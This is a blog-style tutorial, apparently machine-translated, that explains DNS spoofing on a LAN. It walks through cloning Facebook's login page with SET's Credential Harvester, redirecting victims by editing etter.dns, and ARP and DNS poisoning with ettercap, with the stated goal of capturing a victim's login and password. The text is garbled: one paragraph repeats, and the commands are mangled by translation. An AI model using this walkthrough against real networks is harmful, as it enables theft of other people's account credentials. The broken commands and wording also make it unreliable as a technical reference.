DNS Spoofing
Impersonation domain name. This is the distortion of a "domain name-IP" to a name resolution query, ie solve a fake IP address a certain name NS or vice versa. This is achieved by distorting the relationship entries-IP domain name of a DNS server by any particular server vulnerability or confidence to unreliable servers. Falsified entries of a DNS server are likely to infect (poison) the DNS cache different server (DNS Poisoning).
SCENARIO:
The following tutorial has an attack known as DNS spoofing, the following example is based on a LAN with two participants an attacker and a victim:
Attacker:
OS: Backtrack 5 R3
Victim:
Operating system: Windows XP.
The operating system of the victim is irrelevant ...
THE main idea is to get the password and login to your facebook, this example can be done with any website that we wish only to point to the set and the ettercap website cloned.
The following tutorial has an attack known as DNS spoofing, the following example is based on a LAN with two participants an attacker and a victim:
Attacker:
OS: Backtrack 5 R3
Victim:
Operating system: Windows XP.
The operating system of the victim is irrelevant ...
THE main idea is to get the password and login to your facebook, this example can be done with any website that we wish only to point to the set and the ettercap website cloned.
COMMAND:
We enter the following path:
# Cd / pentest / exploits / set We enter the following path:
#. / Set
SET application opens for social engineering type attacks then choose the following options:
Select 1: for an attack Attacks Social Enginnering
In the next menu select 2; Website Attack Vectors
Attack In Multi-select option 3; Credential Harvester Attack Method to perform the cloning of the page you want to attack.
Select option 2 Site Cloner
In the options for successfully clone the product will have to enter your IP address with ifconfig I can get the data, our IP address and network adapter are dealing in my case eth0, if wireless wlan0 default would deal .
After entering our IP, we ask the website to which we wish to perform cloning in facebook'll take care scenario, but you can take any website, whether twitter, youtube, blogger, etc..
Once began to start the cloned web page, you need to have the apache service started, if you do not this, the following message will appear to start the service to which we Y.
Well here we have set up with hits to perform DNS poisoning, the victim would have to put your IP address into your browser, and then the login prompt appear on Facebook.
So that the user does not enter our IP address, a tool called ettetcap deal, its function will be that when the user enter facebook is automatically poisoned and not have to enter our IP. To do this with a text editor, edit the following path / usr / local / share / ettercap / etter.dns and add the following parameters we enter the domain and our IP as pictured.
Dominio.com A IP
*. Domain A IP
IP PTR www.dominio.com
Save and close.
and finally poison:
ettercaps-T-q-i-P network adapter arp dns_spoof-M / / / /
Well when the user connected to our lan go to facebook.com it automatically poison:
VICTIM:
Victim logging into facebook and making the login process:
ATTACKING:
Receive information from the cookies GET capturing the lan.
Well this is a very dangerous, when we connect to public sides, where the wifi connection is free and for thousands of users, such as a university.
0 comments:
Post a Comment